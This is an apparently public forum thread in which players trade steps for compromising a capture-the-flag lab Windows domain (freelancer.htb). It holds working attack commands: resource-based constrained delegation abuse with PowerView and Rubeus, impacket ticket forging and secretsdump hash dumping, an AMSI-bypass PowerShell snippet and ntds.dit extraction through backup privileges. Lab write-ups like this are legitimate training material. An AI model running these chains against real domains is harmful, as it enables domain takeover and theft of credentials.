Posts: 196
Threads: 31
Joined: Apr 2024
Jun 03, 2024, 04:02 AM
(This post was last modified: Jun 03, 2024, 04:51 AM by maggi.)
I liked the Windows hard box from last season, based on the Iron Man stuff, more than the Attack on Titan hard box; I thought it all lined up with the characters/users better.
Posts: 219
Threads: 14
Joined: Apr 2024
(Jun 03, 2024, 05:16 AM)xss_02 Wrote: How do I get root from liza?
Bro, how to get liza? U reset her pass? Or what? I'm stuck on lorra.
Posts: 57
Threads: 1
Joined: Apr 2024
Jun 03, 2024, 06:55 AM
(This post was last modified: Jun 03, 2024, 07:11 AM by ritualist.)
Sharing my steps after getting lorra shell. Maybe it will help someone and get me unstuck.
After bypassing AMSI (snippet earlier in this thread), I used BloodHound to collect info about the domain.
Lorra is in the "AD RECYCLE BIN" group which has GenericWrite on the DC computer.
BloodHound describes how to abuse it. This link it gives has a good summary of commands:
https://gist.github.com/HarmJ0y/224dbfef...51e40d52ff
It does not involve restoring deleted files but maybe this is relevant for other paths (?).
Needs PowerView/PowerMad:
# create a machine account we control (ms-DS-MachineAccountQuota has to allow it)
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
# its SID goes into the ACE of the descriptor
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
# one full-control ACE (CCDCLCSWRPWPDTLOCRSDRCWDWO = 0xF01FF) for that SID, owner BUILTIN\Administrators
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# write the binary descriptor into the DC's msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
After this we have control of attackersystem$ which also shows as AllowedToAct on the DC machine in BloodHound.
It should be possible to use this either on the shell with Rubeus or directly from the attacker machine.
These are the commands I tried.
Windows:
Invoke-Rubeus "s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:cifs/dc.freelancer.htb /ptt"
It generates a valid ticket that also shows with klist:
Cached Tickets: (1)
#0> Client: Administrator @ FREELANCER.HTB
Server: cifs/dc.freelancer.htb @ FREELANCER.HTB
...
Unfortunately it doesn't allow me access to the DC share
dir //dc/c$
...
PermissionDenied: (\\dc\c$:String) [Get-ChildItem], UnauthorizedAccessException
I also tried this from Kali:
sudo rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb
(combined with rdate because I kept getting clock skew errors)
It successfully generates a ticket
[*] Saving ticket in Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache
Which I try to abuse with secretsdump/psexec:
KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-psexec freelancer/administrator@dc.freelancer.htb -k -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.
Unfortunately this also fails in all the variations I have tried.
When either of these are working, we get the admin hash and root.
Posts: 13
Threads: 1
Joined: Apr 2024
Try with service ldap, it will work, I just rooted it like an hour ago.
Posts: 57
Threads: 1
Joined: Apr 2024
Jun 03, 2024, 07:14 AM
(This post was last modified: Jun 03, 2024, 07:15 AM by ritualist.)
Finally got it working with this in the last step
sudo rdate -n freelancer.htb && KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-secretsdump freelancer/administrator@dc.freelancer.htb -k -no-pass
It was just the clock skew trolling me and giving confusing errors.
Nice machine.
Posts: 219
Threads: 14
Joined: Apr 2024
(Jun 03, 2024, 09:50 AM)3thic4lh4ck3r Wrote: (Jun 03, 2024, 06:55 AM)ritualist Wrote: Sharing my steps after getting lorra shell. Maybe it will help someone and get me unstuck 
How did you bypass AMSI?
Bro, we should bypass AMSI to do what??
Posts: 9
Threads: 0
Joined: Jun 2024
(Jun 03, 2024, 06:55 AM)ritualist Wrote: Sharing my steps after getting lorra shell. Maybe it will help someone and get me unstuck 
For me, any manipulations with groups always return something like: The term 'Add-DomainGroupMember' is not recognized as the name of a cmdlet
How did you call them then?
Posts: 15
Threads: 0
Joined: May 2024
(Jun 03, 2024, 10:26 AM)3thic4lh4ck3r Wrote: (Jun 03, 2024, 10:12 AM)osamy7593 Wrote: (Jun 03, 2024, 09:50 AM)3thic4lh4ck3r Wrote: (Jun 03, 2024, 06:55 AM)ritualist Wrote: Sharing my steps after getting lorra shell. Maybe it will help someone and get me unstuck 
How did you bypass AMSI?
Bro, we should bypass AMSI to do what??
Upload and run powertools, like mimikatz etc.
You cannot run any mimikatz or PowerView to bypass AMSI because AMSI will not allow it
Posts: 15
Threads: 0
Joined: May 2024
Jun 03, 2024, 10:39 AM
(This post was last modified: Jun 03, 2024, 10:59 AM by j868K3792.)
(Jun 03, 2024, 10:37 AM)3thic4lh4ck3r Wrote: (Jun 03, 2024, 10:35 AM)j868K3792 Wrote: (Jun 03, 2024, 10:26 AM)3thic4lh4ck3r Wrote: (Jun 03, 2024, 10:12 AM)osamy7593 Wrote: (Jun 03, 2024, 09:50 AM)3thic4lh4ck3r Wrote: How did you bypass AMSI?
Bro, we should bypass AMSI to do what??
Upload and run powertools, like mimikatz etc.
You cannot run any mimikatz or PowerView to bypass AMSI because AMSI will not allow it
No, I think you got my intention wrong: I want to bypass AMSI to run powertools like ritualist did.
Oh yep, sorry, I skipped the previous question; I thought it was "how to bypass"..
So how to bypass it?
I think to bypass AMSI you need:
# the AmsiUtils type lives in System.Management.Automation ([Ref]'s assembly)
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
# its private static amsiContext field holds the HAMSICONTEXT pointer
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
# overwrite the first 4 bytes at that address (the "AMSI" header signature) so AmsiScanBuffer rejects the context
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
It should copy 0xff to our AMSI object context
BUT
After copying the value to memory the previous value is the same. It was 183...608 and it stays 183...608
UPD: nvm, it was the pointer
But anyway nothing changes; the object is the same as it was before the copy
Posts: 124
Threads: 1
Joined: Apr 2024
(Jun 02, 2024, 11:12 PM)imhitt Wrote: (Jun 02, 2024, 08:43 PM)jsvensson Wrote: (Jun 02, 2024, 06:58 PM)imhitt Wrote: (Jun 02, 2024, 06:50 PM)iiNovaCore Wrote: that's where I'm stuck too
Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
This can give you list of deleted objects.
Then you may call Restore-ADObject -Identity <ObjectGUID>
I used that for each one from the previous command and for me it works only for "liza.kazanof"; when I call it again it shows that it's already restored. But now I am stuck and cannot find where it was restored and how to use it.
So you restore liza.kazanof - this is a user in the Backup Operators group - with it you could copy SYSTEM and ntds.dit and use secretsdump. There is a password in the forum for user liza.k; it could be sprayed for liza.kazanof, as I think this is the same "person".
It works perfectly. But how to copy the ntds.dit file? Shadow volume does not work and liza.kazanof has no read permission.
liza.kazanof has SeBackup and SeRestore - use diskshadow and robocopy.